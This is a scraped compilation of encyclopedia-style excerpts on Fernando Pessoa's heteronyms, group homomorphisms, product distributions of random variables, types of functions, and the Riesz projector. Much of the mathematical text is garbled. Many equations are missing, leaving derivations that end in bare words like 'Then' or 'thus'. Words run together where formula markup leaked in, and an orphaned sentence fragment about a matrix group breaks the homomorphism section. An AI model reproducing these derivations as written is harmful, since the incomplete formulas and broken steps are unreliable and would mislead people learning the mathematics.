Campos sailed to the Orient, living experiences that he describes in his poem "Opiarium". He worked in London (1915), Barrow-in-Furness and Newcastle (1922), but became unemployed and returned to Lisbon in 1926, the year of the military putsch that installed the dictatorship. He also wrote "Lisbon Revisited (1923)" and "Lisbon Revisited (1926)".
Campos was a decadent poet, but he embraced Futurism; his poetry was strongly influenced by Walt Whitman and Marinetti. He wrote the "Ode Triumphal" and "Ode Maritime", published in the literary journal Orpheu in 1915, and others left unfinished.
While unemployed in Lisbon, he became depressed, returning to Decadentism and Pessimism. He then wrote his masterwork, "Tobacco Shop", published in 1933 in the literary journal Presença.
Pessoa created this heteronym as the "Master" of the other heteronyms and even of Pessoa himself.
This fictional character was born in 1889 and died in 1915, at 26, almost the same age as Pessoa's best friend Mário de Sá-Carneiro, who killed himself in Paris in 1916 less than a month shy of his 26th birthday. Thus, Sá-Carneiro seems to have inspired, at least partially, Alberto Caeiro.
Caeiro was a humble man of poor education but a great naïf poet; he was born in Lisbon but lived almost all his life in the countryside, in Ribatejo, near Lisbon, where he died. Despite his lack of schooling, his poetry is full of philosophy. He wrote "Poemas Inconjuntos" (Disconnected Poems) and "O Guardador de Rebanhos" (The Keeper of Sheep), published by Fernando Pessoa in his "Art Journal" Athena in 1924–25.
In a famous letter to the literary critic Adolfo Casais Monteiro, dated January 13, 1935, Pessoa describes his "triumphal day", March 8, 1914, when Caeiro "appeared", making him write down all the poetry of "The Keeper of Sheep" at once. Caeiro influenced the Neopaganism of Pessoa and of the heteronyms António Mora and Ricardo Reis. Poetically, he influenced mainly the Neoclassicism of Reis, which is connected to Paganism.
This heteronym was created by Pessoa as a Portuguese doctor born in Porto on September 19, 1887. Reis supposedly studied at a boarding school run by Jesuits, in which he received a classical education. He was an amateur Latinist and poet; politically a monarchist, he went into exile in Brazil after the defeat of a monarchical rebellion against the Portuguese Republic in 1919. Ricardo Reis reveals his Epicureanism and Stoicism in the "Odes by Ricardo Reis", published by Pessoa in 1924 in his literary journal Athena.
Since Pessoa didn't determine the death of Reis, one can assume that he survived his author, who died in 1935. In The Year of the Death of Ricardo Reis (1984), Portuguese Nobel prize winner José Saramago rebuilds, in his own personal outlook, the literary world of this heteronym after 1935, creating a dialogue between Ricardo Reis and the ghost of his author.
See the introductory parts in:
https://en.wikipedia.org/wiki/Heteronym_(literature)
In mathematics, given two groups, (G, ∗) and (H, ·), a group homomorphism from (G, ∗) to (H, ·) is a function h : G → H such that for all u and v in G it holds that
h(u ∗ v) = h(u) · h(v),
where the group operation on the left side of the equation is that of G and on the right side that of H.
From this property, one can deduce that h maps the identity element eG of G to the identity element eH of H,
h(eG) = eH,
and it also maps inverses to inverses in the sense that
h(u⁻¹) = h(u)⁻¹.
Hence one can say that h "is compatible with the group structure".
In areas of mathematics where one considers groups endowed with additional structure, a homomorphism sometimes means a map which respects not only the group structure (as above) but also the extra structure. For example, a homomorphism of topological groups is often required to be continuous.
Let eH be the identity element of the group (H, ·) and u ∈ G; then
h(u) = h(u ∗ eG) = h(u) · h(eG).
Now by multiplying by the inverse of h(u) (or applying the cancellation rule) we obtain
eH = h(eG).
Similarly,
eH = h(eG) = h(u ∗ u⁻¹) = h(u) · h(u⁻¹).
Therefore, by the uniqueness of the inverse: h(u⁻¹) = h(u)⁻¹.
We define the kernel of h to be the set of elements in G which are mapped to the identity in H,
ker(h) = {u ∈ G : h(u) = eH},
and the image of h to be
im(h) = h(G) = {h(u) : u ∈ G}.
The kernel and image of a homomorphism can be interpreted as measuring how close it is to being an isomorphism. The first isomorphism theorem states that the image of a group homomorphism, h(G), is isomorphic to the quotient group G/ker h.
The kernel of h is a normal subgroup of G: assume u ∈ ker(h) and show g⁻¹ ∘ u ∘ g ∈ ker(h) for arbitrary u, g:
h(g⁻¹ ∘ u ∘ g) = h(g)⁻¹ · h(u) · h(g) = h(g)⁻¹ · eH · h(g) = h(g)⁻¹ · h(g) = eH.
The image of h is a subgroup of H.
The homomorphism h is a group monomorphism, i.e., h is injective (one-to-one), if and only if ker(h) = {eG}. Injectivity directly gives that the kernel is trivial; conversely, a trivial kernel gives injectivity, since h(g₁) = h(g₂) implies h(g₁ ∘ g₂⁻¹) = eH, hence g₁ ∘ g₂⁻¹ = eG and g₁ = g₂.
forms a group under matrix multiplication. For any complex numberuthe functionfu:G→C*defined by
If h : G → H and k : H → K are group homomorphisms, then so is k ∘ h : G → K. This shows that the class of all groups, together with group homomorphisms as morphisms, forms a category (specifically the category of groups).
If G and H are abelian (i.e., commutative) groups, then the set Hom(G, H) of all group homomorphisms from G to H is itself an abelian group: the sum h + k of two homomorphisms is defined by
(h + k)(u) = h(u) + k(u).
The commutativity of H is needed to prove that h + k is again a group homomorphism.
The addition of homomorphisms is compatible with the composition of homomorphisms in the following sense: if f is in Hom(K, G), h, k are elements of Hom(G, H), and g is in Hom(H, L), then
(h + k) ∘ f = (h ∘ f) + (k ∘ f) and g ∘ (h + k) = (g ∘ h) + (g ∘ k).
Since the composition is associative, this shows that the set End(G) of all endomorphisms of an abelian group forms a ring, the endomorphism ring of G. For example, the endomorphism ring of the abelian group consisting of the direct sum of m copies of Z/nZ is isomorphic to the ring of m-by-m matrices with entries in Z/nZ. The above compatibility also shows that the category of all abelian groups with group homomorphisms forms a preadditive category; the existence of direct sums and well-behaved kernels makes this category the prototypical example of an abelian category.
https://en.wikipedia.org/wiki/Group_homomorphism
A product distribution is a probability distribution constructed as the distribution of the product of random variables having two other known distributions. Given two statistically independent random variables X and Y, the distribution of the random variable Z that is formed as the product Z = XY is a product distribution.
The product distribution is the PDF of the product of sample values. This is not the same as the product of their PDFs, yet the two concepts are often ambiguously conflated, as in "product of Gaussians".
The product is one type of algebra for random variables: related to the product distribution are the ratio distribution, sum distribution (see List of convolutions of probability distributions) and difference distribution. More generally, one may talk of combinations of sums, differences, products and ratios.
Many of these distributions are described in Melvin D. Springer's 1979 book The Algebra of Random Variables.[1]
If X and Y are two independent, continuous random variables, described by probability density functions fX and fY, then the probability density function of Z = XY is[2]
fZ(z) = ∫_{−∞}^{∞} fX(x) fY(z/x) (1/|x|) dx.
We first write the cumulative distribution function of Z starting with its definition
FZ(z) = P(Z ≤ z) = P(XY ≤ z) = ∫_{0}^{∞} fX(x) ∫_{−∞}^{z/x} fY(y) dy dx + ∫_{−∞}^{0} fX(x) ∫_{z/x}^{∞} fY(y) dy dx.
We find the desired probability density function by taking the derivative of both sides with respect to z. Since on the right hand side, z appears only in the integration limits, the derivative is easily performed using the fundamental theorem of calculus and the chain rule. (Note the negative sign that is needed when the variable occurs in the lower limit of the integration.)
fZ(z) = ∫_{0}^{∞} fX(x) fY(z/x) (1/x) dx − ∫_{−∞}^{0} fX(x) fY(z/x) (1/x) dx = ∫_{−∞}^{∞} fX(x) fY(z/x) (1/|x|) dx,
where the absolute value is used to conveniently combine the two terms.[3]
A faster, more compact proof begins with the same step of writing the cumulative distribution of Z starting with its definition:
FZ(z) = ∫_{−∞}^{∞} ∫_{−∞}^{∞} fX(x) fY(y) u(z − xy) dy dx,
where u(⋅) is the Heaviside step function and serves to limit the region of integration to values of x and y satisfying xy ≤ z.
We find the desired probability density function by taking the derivative of both sides with respect to z:
fZ(z) = ∫_{−∞}^{∞} ∫_{−∞}^{∞} fX(x) fY(y) δ(z − xy) dy dx = ∫_{−∞}^{∞} fX(x) fY(z/x) (1/|x|) dx,
where we utilize the translation and scaling properties of the Dirac delta function δ.
A more intuitive description of the procedure is illustrated in the figure below. The joint pdffX(x)fY(y){\displaystyle f_{X}(x)f_{Y}(y)}exists in thex{\displaystyle x}-y{\displaystyle y}plane and an arc of constantz{\displaystyle z}value is shown as the shaded line. To find the marginal probabilityfZ(z){\displaystyle f_{Z}(z)}on this arc, integrate over increments of areadxdyf(x,y){\displaystyle dx\,dy\;f(x,y)}on this contour.
Starting withy=zx{\displaystyle y={\frac {z}{x}}}, we havedy=−zx2dx=−yxdx{\displaystyle dy=-{\frac {z}{x^{2}}}\,dx=-{\frac {y}{x}}\,dx}. So the probability increment isδp=f(x,y)dx|dy|=fX(x)fY(z/x)y|x|dxdx{\displaystyle \delta p=f(x,y)\,dx\,|dy|=f_{X}(x)f_{Y}(z/x){\frac {y}{|x|}}\,dx\,dx}. Sincez=yx{\displaystyle z=yx}impliesdz=ydx{\displaystyle dz=y\,dx}, we can relate the probability increment to thez{\displaystyle z}-increment, namelyδp=fX(x)fY(z/x)1|x|dxdz{\displaystyle \delta p=f_{X}(x)f_{Y}(z/x){\frac {1}{|x|}}\,dx\,dz}. Then integration overx{\displaystyle x}, yieldsfZ(z)=∫fX(x)fY(z/x)1|x|dx{\displaystyle f_{Z}(z)=\int f_{X}(x)f_{Y}(z/x){\frac {1}{|x|}}\,dx}.
LetX∼f(x){\displaystyle X\sim f(x)}be a random sample drawn from probability distributionfx(x){\displaystyle f_{x}(x)}. ScalingX{\displaystyle X}byθ{\displaystyle \theta }generates a sample from scaled distributionθX∼1|θ|fX(xθ){\displaystyle \theta X\sim {\frac {1}{|\theta |}}f_{X}\left({\frac {x}{\theta }}\right)}which can be written as a conditional distributiongx(x|θ)=1|θ|fx(xθ){\displaystyle g_{x}(x|\theta )={\frac {1}{|\theta |}}f_{x}\left({\frac {x}{\theta }}\right)}.
Lettingθ{\displaystyle \theta }be a random variable with pdffθ(θ){\displaystyle f_{\theta }(\theta )}, the distribution of the scaled sample becomesfX(θx)=gX(x∣θ)fθ(θ){\displaystyle f_{X}(\theta x)=g_{X}(x\mid \theta )f_{\theta }(\theta )}and integrating outθ{\displaystyle \theta }we gethx(x)=∫−∞∞gX(x|θ)fθ(θ)dθ{\displaystyle h_{x}(x)=\int _{-\infty }^{\infty }g_{X}(x|\theta )f_{\theta }(\theta )d\theta }soθX{\displaystyle \theta X}is drawn from this distributionθX∼hX(x){\displaystyle \theta X\sim h_{X}(x)}. However, substituting the definition ofg{\displaystyle g}we also havehX(x)=∫−∞∞1|θ|fx(xθ)fθ(θ)dθ{\displaystyle h_{X}(x)=\int _{-\infty }^{\infty }{\frac {1}{|\theta |}}f_{x}\left({\frac {x}{\theta }}\right)f_{\theta }(\theta )\,d\theta }which has the same form as the product distribution above. Thus the Bayesian posterior distributionhX(x){\displaystyle h_{X}(x)}is the distribution of the product of the two independent random samplesθ{\displaystyle \theta }andX{\displaystyle X}.
For the case of one variable being discrete, letθ{\displaystyle \theta }have probabilityPi{\displaystyle P_{i}}at levelsθi{\displaystyle \theta _{i}}with∑iPi=1{\displaystyle \sum _{i}P_{i}=1}. The conditional density isfX(x∣θi)=1|θi|fx(xθi){\displaystyle f_{X}(x\mid \theta _{i})={\frac {1}{|\theta _{i}|}}f_{x}\left({\frac {x}{\theta _{i}}}\right)}. ThereforefX(θx)=∑iPi|θi|fX(xθi){\displaystyle f_{X}(\theta x)=\sum _{i}{\frac {P_{i}}{|\theta _{i}|}}f_{X}\left({\frac {x}{\theta _{i}}}\right)}.
When two random variables are statistically independent, the expectation of their product is the product of their expectations. This can be proved from the law of total expectation:
E[XY] = E[E[XY ∣ Y]].
In the inner expression, Y is a constant. Hence
E[XY ∣ Y] = Y E[X ∣ Y] and E[XY] = E[Y E[X ∣ Y]].
This is true even if X and Y are statistically dependent, in which case E[X ∣ Y] is a function of Y. In the special case in which X and Y are statistically independent, it is a constant independent of Y. Hence
E[XY] = E[Y E[X]] = E[X] E[Y].
Let X, Y be uncorrelated random variables with means μX, μY and variances σX², σY².
If, additionally, the random variables X² and Y² are uncorrelated, then the variance of the product XY is[4]
Var(XY) = σX² σY² + σX² μY² + σY² μX².
In the case of the product of more than two variables, if X1 ⋯ Xn, n > 2, are statistically independent, then[5] the variance of their product is
Var(X1 ⋯ Xn) = ∏_{i=1}^{n} (σi² + μi²) − ∏_{i=1}^{n} μi².
Assume X, Y are independent random variables. The characteristic function of X is φX(t), and the distribution of Y is known. Then from the law of total expectation, we have[6]
φZ(t) = E(e^{itXY}) = E(E(e^{itXY} ∣ Y)) = E(φX(tY)).
If the characteristic functions and distributions of bothXandYare known, then alternatively,φZ(t)=E(φY(tX)){\displaystyle \varphi _{Z}(t)=\operatorname {E} (\varphi _{Y}(tX))}also holds.
The Mellin transform of a distribution f(x) with support only on x ≥ 0 and having a random sample X is
M f(s) = ∫_{0}^{∞} x^{s−1} f(x) dx = E[X^{s−1}].
The inverse transform is
f(x) = (1/2πi) ∫_{c−i∞}^{c+i∞} x^{−s} M f(s) ds.
If X and Y are two independent random samples from different distributions, then the Mellin transform of their product is equal to the product of their Mellin transforms:
M_{XY}(s) = M_X(s) M_Y(s).
If s is restricted to integer values, a simpler result is
E[(XY)^n] = E[X^n] E[Y^n].
Thus the moments of the random product XY are the product of the corresponding moments of X and Y, and this extends to non-integer moments, for example
E[(XY)^{1/2}] = E[X^{1/2}] E[Y^{1/2}].
The pdf of a function can be reconstructed from its moments using the saddlepoint approximation method.
A further result is that for independent X, Y,
E[X^p Y^q] = E[X^p] E[Y^q].
Gamma distribution exampleTo illustrate how the product of moments yields a much simpler result than finding the moments of the distribution of the product, letX,Y{\displaystyle X,Y}be sampled from twoGamma distributions,fGamma(x;θ,1)=Γ(θ)−1xθ−1e−x{\displaystyle f_{Gamma}(x;\theta ,1)=\Gamma (\theta )^{-1}x^{\theta -1}e^{-x}}with parametersθ=α,β{\displaystyle \theta =\alpha ,\beta }whose moments are
Multiplying the corresponding moments gives the Mellin transform result
Independently, it is known that the product of two independent Gamma-distributed samples (~Gamma(α,1) and Gamma(β,1)) has a K-distribution:
To find the moments of this, make the change of variable y = 2√z, simplifying the integral to:
thus
The definite integral
which, after some reduction, agrees with the moment product result above.
If X, Y are drawn independently from Gamma distributions with shape parameters α, β, then
This type of result is universally true, since for bivariate independent variables f_{X,Y}(x,y) = f_X(x) f_Y(y); thus
or, equivalently, it is clear that X^p and Y^q are independent variables.
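The Gamma moment identity E[X^p] = Γ(θ+p)/Γ(θ) for X ~ Gamma(θ, 1), combined with the product rule above, gives E[(XY)^p] = Γ(α+p)Γ(β+p)/(Γ(α)Γ(β)). A short sketch comparing the closed form with simulation (parameter values and tolerances are illustrative choices):

```python
import math
import random

def gamma_product_moment(alpha, beta, p):
    # E[(XY)^p] for independent X ~ Gamma(alpha, 1), Y ~ Gamma(beta, 1):
    # moments multiply, and E[X^p] = Gamma(theta + p) / Gamma(theta)
    return (math.gamma(alpha + p) * math.gamma(beta + p)
            / (math.gamma(alpha) * math.gamma(beta)))

def mc_gamma_product_moment(alpha, beta, p, n=200_000, seed=3):
    # Monte Carlo estimate of the same moment
    rng = random.Random(seed)
    return sum((rng.gammavariate(alpha, 1.0) * rng.gammavariate(beta, 1.0)) ** p
               for _ in range(n)) / n
```

For p = 1 this reduces to E[XY] = αβ, the product of the two means.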
The distribution of the product of two random variables which have lognormal distributions is again lognormal. This is itself a special case of a more general set of results, where the logarithm of the product can be written as the sum of the logarithms. Thus, in cases where a simple result can be found in the list of convolutions of probability distributions, where the distributions to be convolved are those of the logarithms of the components of the product, the result might be transformed to provide the distribution of the product. However, this approach is only useful where the logarithms of the components of the product are in some standard families of distributions.
Let Z be the product of two independent variables, Z = X₁X₂, each uniformly distributed on the interval [0,1], possibly the outcome of a copula transformation. As noted in "Lognormal distributions" above, PDF convolution operations in the log domain correspond to the product of sample values in the original domain. Thus, making the transformation u = ln(x), such that p_U(u)|du| = p_X(x)|dx|, each variate is distributed independently on u as
and the convolution of the two distributions is the autoconvolution
Next retransform the variable toz=ey{\displaystyle z=e^{y}}yielding the distribution
For the product of multiple (> 2) independent samples, the characteristic function route is favorable. If we define ỹ = −y, then each transformed variate is Gamma-distributed with shape 1 and scale factor 1 (i.e., exponential, with density e^(−ỹ)) and known CF (1 − it)⁻¹; the autoconvolution c(ỹ) = ỹ e^(−ỹ) above is then a Gamma distribution of shape 2. Note that |dỹ| = |dy|, so the Jacobian of the transformation is unity.
The convolution ofn{\displaystyle n}independent samples fromY~{\displaystyle {\tilde {Y}}}therefore has CF(1−it)−n{\displaystyle (1-it)^{-n}}which is known to be the CF of a Gamma distribution of shapen{\displaystyle n}:
Make the inverse transformationz=ey{\displaystyle z=e^{y}}to extract the PDF of the product of thensamples:
The following, more conventional, derivation from Stackexchange[7]is consistent with this result.
First of all, letting Z₂ = X₁X₂, its CDF is
The density of z₂ is then f(z₂) = −log(z₂).
Multiplying by a third independent sample gives distribution function
Taking the derivative yieldsfZ3(z)=12log2(z),0<z≤1.{\displaystyle f_{Z_{3}}(z)={\frac {1}{2}}\log ^{2}(z),\;\;0<z\leq 1.}
The author of the note conjectures that, in general,fZn(z)=(−logz)n−1(n−1)!,0<z≤1{\displaystyle f_{Z_{n}}(z)={\frac {(-\log z)^{n-1}}{(n-1)!\;\;\;}},\;\;0<z\leq 1}
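The conjectured density is easy to test numerically: if f_{Z_n}(z) = (−log z)^(n−1)/(n−1)!, then E[Z^k] = ∫₀¹ z^k f(z) dz should equal (k+1)^(−n), which is exactly (E[U^k])ⁿ from the Mellin product rule. A sketch using a simple midpoint rule (step count and tolerances are arbitrary choices):

```python
import math

def pdf_product_uniforms(z, n):
    # conjectured density of the product of n iid Uniform(0,1) variables, 0 < z <= 1
    return (-math.log(z)) ** (n - 1) / math.factorial(n - 1)

def numeric_moment(k, n, steps=50_000):
    # midpoint-rule estimate of E[Z^k] = integral of z^k f(z) over (0, 1);
    # exact value is (k + 1)^(-n)
    h = 1.0 / steps
    return sum(((i + 0.5) * h) ** k * pdf_product_uniforms((i + 0.5) * h, n) * h
               for i in range(steps))
```

The k = 0 case checks that the density integrates to one.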
The figure illustrates the nature of the integrals above. The area within the unit square lying below the curve xy = z represents the CDF of z. This divides into two parts. The first is for 0 < x < z, where the increment of area in the vertical slot is just dx. The second part lies below the xy curve, has y-height z/x, and incremental area (z/x) dx.
The density of the product of two independent Normal samples involves a modified Bessel function. Let x, y be independent samples from a Normal(0,1) distribution and z = xy.
Then
The variance of this distribution could be determined, in principle, by a definite integral from Gradshteyn and Ryzhik,[8]
thusE[Z2]=∫−∞∞z2K0(|z|)πdz=4πΓ2(32)=1{\displaystyle \operatorname {E} [Z^{2}]=\int _{-\infty }^{\infty }{\frac {z^{2}K_{0}(|z|)}{\pi }}\,dz={\frac {4}{\pi }}\;\Gamma ^{2}{\Big (}{\frac {3}{2}}{\Big )}=1}
A much simpler result, stated in a section above, is that the variance of the product of zero-mean independent samples is equal to the product of their variances. Since the variance of each Normal sample is one, the variance of the product is also one.
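Both claims (zero mean, unit variance for z = xy with x, y ~ N(0,1)) are easy to confirm by simulation; the sample size, seed, and tolerances below are arbitrary choices:

```python
import random

def normal_product_stats(n=300_000, seed=11):
    # sample z = x*y with x, y independent N(0,1); return (mean, variance)
    rng = random.Random(seed)
    prods = [rng.gauss(0.0, 1.0) * rng.gauss(0.0, 1.0) for _ in range(n)]
    mean = sum(prods) / n
    var = sum((p - mean) ** 2 for p in prods) / n
    return mean, var
```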
The product of two Gaussian samples is often confused with the product of two Gaussian PDFs. The latter simply results in a bivariate Gaussian distribution.
The case of the product of correlated Normal samples was addressed by Nadarajah and Pogány.[9] Let X, Y be zero-mean, unit-variance, normally distributed variates with correlation coefficient ρ, and let Z = XY.
Then
Mean and variance: For the mean we have E[Z] = ρ from the definition of the correlation coefficient. The variance can be found by transforming from two unit-variance, zero-mean, uncorrelated variables U, V. Let
Then X, Y are unit-variance variables with correlation coefficient ρ, and
Removing odd-power terms, whose expectations are obviously zero, we get
Since (E[Z])² = ρ², we have
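The resulting moments, E[Z] = ρ and Var(Z) = 1 + ρ², can be checked by simulating the same U, V construction used in the derivation (ρ = 0.6 and the tolerances are illustrative choices):

```python
import math
import random

def correlated_product_stats(rho, n=300_000, seed=5):
    # X = U and Y = rho*U + sqrt(1 - rho^2)*V are unit-variance normals
    # with correlation rho; return sample mean and variance of Z = X*Y
    rng = random.Random(seed)
    s = math.sqrt(1.0 - rho * rho)
    prods = []
    for _ in range(n):
        u = rng.gauss(0.0, 1.0)
        v = rng.gauss(0.0, 1.0)
        prods.append(u * (rho * u + s * v))
    m = sum(prods) / n
    var = sum((p - m) ** 2 for p in prods) / n
    return m, var
```

At ρ = 0 this recovers the unit variance of the uncorrelated product above.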
High correlation asymptote
In the highly correlated case ρ → 1, the product converges on the square of one sample. In this case the K₀ asymptote is K₀(x) → √(π/(2x)) e^(−x) in the limit as x = |z|/(1 − ρ²) → ∞, and
which is a chi-squared distribution with one degree of freedom.
Multiple correlated samples. Nadarajah et al. further show that if Z₁, Z₂, ..., Zₙ are n iid random variables sampled from f_Z(z), and Z̄ = (1/n)∑Zᵢ is their mean, then
where W is the Whittaker function, while β = n/(1 − ρ), γ = n/(1 + ρ).
Using the identity W_{0,ν}(x) = √(x/π) K_ν(x/2), x ≥ 0 (see, for example, the DLMF compilation, eqn. (13.13.9)[10]), this expression can be somewhat simplified to
The pdf gives the marginal distribution of a sample bivariate normal covariance, a result also shown in the Wishart Distribution article. The approximate distribution of a correlation coefficient can be found via theFisher transformation.
Multiple non-central correlated samples. The distribution of the product of correlated non-central normal samples was derived by Cui et al.[11]and takes the form of an infinite series of modified Bessel functions of the first kind.
Moments of product of correlated central normal samples
For a central normal distribution N(0,1), the moments are
where n!! denotes the double factorial.
If X, Y ~ Norm(0,1) are central correlated variables (the simplest bivariate case of the multivariate normal moment problem described by Kan[12]), then
where
[needs checking]
These product distributions are somewhat comparable to the Wishart distribution. The latter is the joint distribution of the four elements (actually only three independent elements) of a sample covariance matrix. If x_t, y_t are samples from a bivariate time series, then W = ∑_{t=1}^{K} (x_t, y_t)ᵀ(x_t, y_t) is a Wishart matrix with K degrees of freedom. The product distributions above are the unconditional distribution of the aggregate of K > 1 samples of W_{2,1}.
Let u₁, v₁, u₂, v₂ be independent samples from a Normal(0,1) distribution. Setting z₁ = u₁ + iv₁ and z₂ = u₂ + iv₂, then z₁, z₂ are independent zero-mean complex normal samples with circular symmetry. Their complex variances are Var(zᵢ) = 2.
The density functions of
The variable yᵢ ≡ rᵢ² is clearly chi-squared with two degrees of freedom and has PDF
Wells et al.[13]show that the density function ofs≡|z1z2|{\displaystyle s\equiv |z_{1}z_{2}|}is
and the cumulative distribution function ofs{\displaystyle s}is
Thus the polar representation of the product of two uncorrelated complex Gaussian samples is
The first and second moments of this distribution can be found from the integral inNormal Distributionsabove
Thus its variance is Var(s) = m₂ − m₁² = 4 − π²/4.
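These moments (m₁ = π/2, m₂ = 4, hence Var(s) = 4 − π²/4 ≈ 1.533) can be confirmed by sampling the magnitudes directly; sample size, seed, and tolerances are arbitrary choices:

```python
import math
import random

def complex_magnitude_product_moments(n=300_000, seed=9):
    # s = |z1 z2| where z1, z2 are circular complex normals whose real and
    # imaginary parts are N(0,1); |z_i| = hypot of two N(0,1) draws.
    # Returns sample estimates of m1 = E[s] and m2 = E[s^2].
    rng = random.Random(seed)
    def magnitude():
        return math.hypot(rng.gauss(0.0, 1.0), rng.gauss(0.0, 1.0))
    samples = [magnitude() * magnitude() for _ in range(n)]
    m1 = sum(samples) / n
    m2 = sum(x * x for x in samples) / n
    return m1, m2
```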
Further, the density of z ≡ s² = |r₁r₂|² = |r₁|²|r₂|² = y₁y₂ corresponds to the product of two independent chi-square samples yᵢ, each with two DoF. Writing these as scaled Gamma distributions, f_y(yᵢ) = (1/(θΓ(1))) e^(−yᵢ/θ) with θ = 2, then, from the Gamma products below, the density of the product is
Let u₁, v₁, u₂, v₂, ..., u_{2N}, v_{2N} be 4N independent samples from a Normal(0,1) distribution. Setting z₁ = u₁ + iv₁, z₂ = u₂ + iv₂, ..., z_{2N} = u_{2N} + iv_{2N}, then z₁, z₂, ..., z_{2N} are independent zero-mean complex normal samples with circular symmetry.
Let s ≡ ∑_{i=1}^{N} z_{2i−1} z_{2i}. Heliot et al.[14] show that the joint density function of the real and imaginary parts of s, denoted s_R and s_I respectively, is given by
{\displaystyle p_{s_{\textrm {R}},s_{\textrm {I}}}(s_{\textrm {R}},s_{\textrm {I}})={\frac {2\left(s_{\textrm {R}}^{2}+s_{\textrm {I}}^{2}\right)^{\frac {N-1}{2}}}{\pi \Gamma (N)\sigma _{s}^{N+1}}}K_{N-1}\!\left(\!2{\frac {\sqrt {s_{\textrm {R}}^{2}+s_{\textrm {I}}^{2}}}{\sigma _{s}}}\right),} where σ_s is the standard deviation of s. Note that σ_s = 1 if all the uᵢ, vᵢ variables are Normal(0,1).
They also prove that the density function of the magnitude of s, |s|, is
p|s|(s)=4Γ(N)σsN+1sNKN−1(2sσs),{\displaystyle p_{|s|}(s)={\frac {4}{\Gamma (N)\sigma _{s}^{N+1}}}s^{N}K_{N-1}\left({\frac {2s}{\sigma _{s}}}\right),}wheres=sR2+sI2{\displaystyle s={\sqrt {s_{\textrm {R}}^{2}+s_{\textrm {I}}^{2}}}}.
The first moment of this distribution, i.e. the mean of|s|{\displaystyle |s|}, can be expressed as
E{|s|}=πσsΓ(N+12)2Γ(N),{\displaystyle E\{|s|\}={\sqrt {\pi }}\sigma _{s}{\frac {\Gamma (N+{\frac {1}{2}})}{2\Gamma (N)}},}which further simplifies asE{|s|}∼σsπN2,{\displaystyle E\{|s|\}\sim {\frac {\sigma _{s}{\sqrt {\pi N}}}{2}},}whenN{\displaystyle N}is asymptotically large (i.e.,N→∞{\displaystyle N\rightarrow \infty }) .
The product of non-central independent complex Gaussians is described by O’Donoughue and Moura[15]and forms a double infinite series ofmodified Bessel functionsof the first and second types.
The product of two independent Gamma samples,z=x1x2{\displaystyle z=x_{1}x_{2}}, definingΓ(x;ki,θi)=xki−1e−x/θiΓ(ki)θiki{\displaystyle \Gamma (x;k_{i},\theta _{i})={\frac {x^{k_{i}-1}e^{-x/\theta _{i}}}{\Gamma (k_{i})\theta _{i}^{k_{i}}}}}, follows[16]
Nagar et al.[17]define a correlated bivariate beta distribution
where
Then the pdf ofZ=XYis given by
where2F1{\displaystyle {_{2}F_{1}}}is the Gauss hypergeometric function defined by the Euler integral
Note that multivariate distributions are not generally unique, apart from the Gaussian case, and there may be alternatives.
The distribution of the product of a random variable having a uniform distribution on (0,1) with a random variable having a gamma distribution with shape parameter equal to 2 is an exponential distribution.[18] A more general case concerns the distribution of the product of a random variable having a beta distribution with a random variable having a gamma distribution: for some cases where the parameters of the two component distributions are related in a certain way, the result is again a gamma distribution but with a changed shape parameter.[18]
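The uniform-times-gamma result is consistent with the Mellin approach above: E[(UG)^p] = Γ(p+2)/(p+1) = Γ(p+1), which are exactly the moments of Exponential(1). A quick simulation of the mean and tail probability (sample size, seed, and tolerances are arbitrary choices):

```python
import random

def uniform_gamma_product(n=300_000, seed=2):
    # Z = U * G with U ~ Uniform(0,1) and G ~ Gamma(shape=2, scale=1);
    # the claim is Z ~ Exponential(1), so E[Z] = 1 and P(Z > 1) = e^(-1)
    rng = random.Random(seed)
    zs = [rng.random() * rng.gammavariate(2.0, 1.0) for _ in range(n)]
    mean = sum(zs) / n
    tail = sum(z > 1.0 for z in zs) / n
    return mean, tail
```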
The K-distribution is an example of a non-standard distribution that can be defined as a product distribution (where both components have a gamma distribution).
The product of n Gamma and m Pareto independent samples was derived by Nadarajah.[19]
|
https://en.wikipedia.org/wiki/Product_distribution#expectation
|
In mathematics, functions can be identified according to the properties they have. These properties describe the functions' behaviour under certain conditions.
These properties concern thedomain, thecodomainand theimageof functions.
These properties concern how the function is affected byarithmeticoperations on its argument.
The following are special examples of ahomomorphismon abinary operation:
Relative tonegation:
Relative to a binary operation and anorder:
Relative to topology and order:
Relative to measure and topology:
In general, functions are often defined by specifying the name of a dependent variable, and a way of calculating what it should map to. For this purpose, the ↦ symbol or Church's λ is often used. Also, sometimes mathematicians notate a function's domain and codomain by writing, e.g., f : A → B. These notions extend directly to lambda calculus and type theory, respectively.
These are functions that operate on functions or produce other functions; seeHigher order function.
Examples are:
Category theoryis a branch of mathematics that formalizes the notion of a special function via arrows ormorphisms. Acategoryis an algebraic object that (abstractly) consists of a class ofobjects, and for every pair of objects, a set ofmorphisms. A partial (equiv.dependently typed) binary operation calledcompositionis provided on morphisms, every object has one special morphism from it to itself called theidentityon that object, and composition and identities are required to obey certain relations.
In a so-calledconcrete category, the objects are associated with mathematical structures likesets,magmas,groups,rings,topological spaces,vector spaces,metric spaces,partial orders,differentiable manifolds,uniform spaces, etc., and morphisms between two objects are associated withstructure-preserving functionsbetween them. In the examples above, these would befunctions, magmahomomorphisms,group homomorphisms,ring homomorphisms,continuous functions,linear transformations(ormatrices),metric maps,monotonic functions,differentiable functions, anduniformly continuousfunctions, respectively.
As an algebraic theory, one of the advantages of category theory is to enable one to prove many general results with a minimum of assumptions. Many common notions from mathematics (e.g.surjective,injective,free object,basis, finiterepresentation,isomorphism) are definable purely in category theoretic terms (cf.monomorphism,epimorphism).
Category theory has been suggested as a foundation for mathematics on par withset theoryandtype theory(cf.topos).
Allegory theory[1]provides a generalization comparable to category theory forrelationsinstead of functions.
|
https://en.wikipedia.org/wiki/List_of_types_of_functions
|
In mathematics, or more specifically in spectral theory, the Riesz projector is the projector onto the eigenspace corresponding to a particular eigenvalue of an operator (or, more generally, a projector onto an invariant subspace corresponding to an isolated part of the spectrum). It was introduced by Frigyes Riesz in 1912.[1][2]
LetA{\displaystyle A}be aclosed linear operatorin the Banach spaceB{\displaystyle {\mathfrak {B}}}. LetΓ{\displaystyle \Gamma }be a simple or composite rectifiable contour, which encloses some regionGΓ{\displaystyle G_{\Gamma }}and lies entirely within theresolvent setρ(A){\displaystyle \rho (A)}(Γ⊂ρ(A){\displaystyle \Gamma \subset \rho (A)}) of the operatorA{\displaystyle A}. Assuming that the contourΓ{\displaystyle \Gamma }has a positive orientation with respect to the regionGΓ{\displaystyle G_{\Gamma }}, the Riesz projector corresponding toΓ{\displaystyle \Gamma }is defined by
Here I_{\mathfrak{B}} is the identity operator in {\mathfrak{B}}.
